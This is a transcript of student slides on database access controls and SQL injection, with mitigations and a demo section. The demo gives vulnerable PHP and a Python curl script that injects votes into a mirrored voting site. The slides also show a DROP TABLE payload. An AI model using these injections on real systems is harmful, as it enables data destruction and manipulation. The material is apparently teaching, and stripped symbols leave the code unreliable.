Database Security - PowerPoint PPT Presentation

1 / 51
About This Presentation
Title:

Database Security

Description:

Who is allowed access to the instance and/or database. Where and how a user's password will be ... { mysql_query('UPDATE thing SET votesFor=votesFor '.$forA. ... – PowerPoint PPT presentation

Number of Views:22
Avg rating:3.0/5.0
Slides: 52
Provided by: natprak
Category:

less

Transcript and Presenter's Notes

Title: Database Security


1
Database Security
  • Types of attacks and mitigation strategies

Group Members Tushar Sugandhi Natthapol
Prakongpan Travis Whilden Brendan Kohlar Jonathan
Reitnauer
2
Database Access Control
  • Part I

3
Review Databases
  • IBM DB2
  • Oracle
  • Microsoft SQL Server
  • MySQL
  • PostgreSQL

4
Security Mechanisms
  • Authentication
  • Who is allowed access to the instance and/or
    database
  • Where and how a user's password will be verified
  • Authorization
  • The authority level that a user is granted
  • The commands that a user is allowed to run
  • The data that a user is allowed to read and/or
    alter
  • The database objects a user is allowed to create,
    alter, and/or drop
  • Privileges
  • Granular authorization

5
IBM DB2 Authentication
  • Works closely with the security features of the
    underlying operating system to verify user IDs
    and passwords.
  • Can use Kerberos to authenticate users.

6
IBM DB2 Authorization
  • Determine the operations that users and/or groups
    can perform.
  • Determine the data objects that users can access.
  • Five authority levels
  • SYSADM
  • SYSCTRL
  • SYSMAINT
  • DBADM
  • LOAD

7
IBM DB2 Privileges
  • More granular then authorities.
  • Can be assigned to users and/or groups.
  • Help define the objects that a user can create or
    drop.
  • Help define the commands that a user can use to
    access objects (tables, views, indexes, packages).

8
Oracle Security
  • Authentication (Identity Management)
  • Virtual Private Database
  • Oracle Label Security
  • Row Level Authentication

9
Oracle Identity Management
  • LDAP Directory Service
  • Directory integration and provision services
  • Authentication and authorization services
  • Certificate authority (CA)

10
Oracle Virtual Private Database
  • Allow policy to be associated with specific
    columns in tables.
  • Relevant Column and Masking

11
Oracle Label Security
  • Provides a secure engine and data dictionary for
    managing access to data using sensitivity label.
  • Row level security can be achieved with no
    programming required.
  • Sensitivity labels are used to determine users
    ability to view and update data.

12
Oracle Label Security
13
Microsoft SQL Server
  • Authentication
  • Access Permission
  • Roles

14
MS SQL Authentication
  • Two methods for user authentication
  • Windows authentication
  • Default and preferred
  • Secure authentication with underlying operating
    system
  • SQL Server authentication
  • Strongly discourage
  • Not as secure (Clear text password)

15
MS SQL Access Permission
  • Statement Permissions

16
MS SQL Access Permission
  • Object Permissions

17
MS SQL Roles
18
(No Transcript)
19
(No Transcript)
20
MySQL
  • Limited Security Features
  • Authentication
  • Permission

21
MySQL Authentication
  • User table/grant table in master database.
  • Stored in plaintext.
  • Can be view by anyone if not configured properly.
  • No ties to OS.
  • MySQLs root has no password by default.

22
MySQL Permission
  • Table level control
  • Column level control
  • No row level control

23
(No Transcript)
24
Postgre SQL Authentication
  • Trust Authentication
  • OS-based
  • Password Authentication
  • md5, crypt, or password through a user table
  • Kerberos Authentication
  • Kerberos auth. server
  • Ident-based Authentication
  • Username, password, machine, OS.
  • Pluggable Authentication Module (PAM)
  • Custom authentication method.

25
Postgre SQL Permission
  • Read
  • SELECT
  • Append
  • INSERT
  • Write
  • UPDATE/DELETE
  • Rules
  • Allows a user to modify permission on a database.
  • Super user

26
(No Transcript)
27
(No Transcript)
28
Features Comparison
29
SQL INJECTION ATTACKS
Part II
  • THE BASICS

30
What is SQL Injection?
  • A security vulnerability exploiting the
    application layer of the database
  • Improperly handled user input injected into DBMS
    as SQL statements

31
Where is it Done?
  • Potentially any field requiring user input!
  • Attacking either the user handle or password in
    login authentication is most commonly associated
    location of SQL Injection

32
Specifically
  • SQL Injection attacks can be broken down into the
    exploitation of two vulnerabilities
  • Improper removal of escape characters
  • Weak type enforcement

33
VulnerabilityEscape Characters
  • When escape characters used in SQL query/command
    are not properly filtered from user input
  • Triggers an escape sequence from the current
    query, such as setting a dummy value equal to
    itself
  • The statement X X is always true

34
Example Escape Characters Exploit
  • Application prompts user for userName
  • statement "SELECT FROM users WHERE name '"
    userName "'
  • User injects partial SQL code into prompt
  • a' or 't''t
  • statement becomes
  • SELECT FROM users WHERE name 'a' or 't''t'
  • Or condition always returns true

35
VulnerabilityWeak Type Enforcement
  • When type constraints are not properly
    implemented for user input
  • Malicious user injects a data type for input that
    was not an intended value

36
ExampleWeak Type Enforcement Exploit
  • Application prompts user for numeric value for
    row selection for following code
  • statement "SELECT FROM data WHERE id "
    a_variable "
  • User injects string statement into prompt
  • 1DROP TABLE users
  • statement becomes
  • SELECT FROM data WHERE id 1DROP TABLE users
  • Execution deletes users table from database

37
Protection From Attack
  • Sanitize the data
  • Secure the application
  • Safeguard the input
  • Use stored procedures

38
ProtectionSanitize the Data
  • More than simply adding backslashes!
  • Need a default-deny regular expression to filter
    through only desired characters
  • s/0-9a-zA-Z//\ returns only alphanumeric
    values
  • Strip quotation marks

39
ProtectionSecure the Application
  • People are the weakest link
  • Limit access to only those who need it!
  • Set each individuals access to lowest required
    permissions

40
ProtectionSafeguard the Input
  • Check your database interface for input handling
    functions
  • Proper quote handling in string parsing
  • Deal with backslashes accordingly

41
ProtectionUse Stored Procedures
  • A viable alternative
  • Resolves issues with dynamic input
  • Tailored to the specific needs of the database

42
DEMO
Part III
43
SQL Injection Demo
  • Attack a real website using SQL injection

44
SQL Injection Demo
  • Bestthing.info Comparing apples to oranges and
    oranges to racecars.
  • User-driven content with database backend
  • Quest to find the best thing ever
  • Mirror of the site at injection.pycoder.net

45
(No Transcript)
46
(No Transcript)
47
Plan of attack
  • Put a phrase at the top of the Best phrases
  • Must get around the protection against duplicate
    ip addresses.

48
Site Code
HTML ltform method"post" action"/"gt ltdivgt
ltinput name"tid0" value"27356" type"hidden"
/gt ltinput name"tid1" value"35705"
type"hidden" /gt ltinput name"A"
type"submit" value"Having a funny hat" /gt or
ltinput name"B" type"submit" value"Bs" /gt
ltbr /gtltbr /gt ltinput type"submit" name"d"
value"Report this pair as a duplicate." /gt
lt/divgt lt/formgt
PHP mysql_query('INSERT INTO votes
(ip,time,tid0,tid1,vote) VALUES
('.ip2long(_SERVER'REMOTE_ADDR').',now(),'._PO
ST'tid0'.','._POST'tid1'.','.(isset(_POST'A
')?10).')') if(mysql_affected_rows()gt0)
mysql_query('UPDATE thing SET votesForvotesFor'.
forA.', votesTotalvotesTotal1 WHERE
tid'.o) mysql_query('UPDATE thing SET
votesForvotesFor'.(forA?01).',
votesTotalvotesTotal1 WHERE tid'.t)
49
Attack Code
Python Script !/usr/bin/python import random,
commands x random.randint(4000,400000) for n
in range(600) while True p
random.randint(4000,400000) If not p in x
x.append(p) break
commands.getoutput((r"curl -d tid0i,i,1\)\
-d tid1-1\ or\ rthing\'test\' -d
Bsubmit rhttp//injection.pycoder.net
" ) (x-2,x-1))
50
(No Transcript)
51
Thank you !!!
Write a Comment
User Comments (0)
About PowerShow.com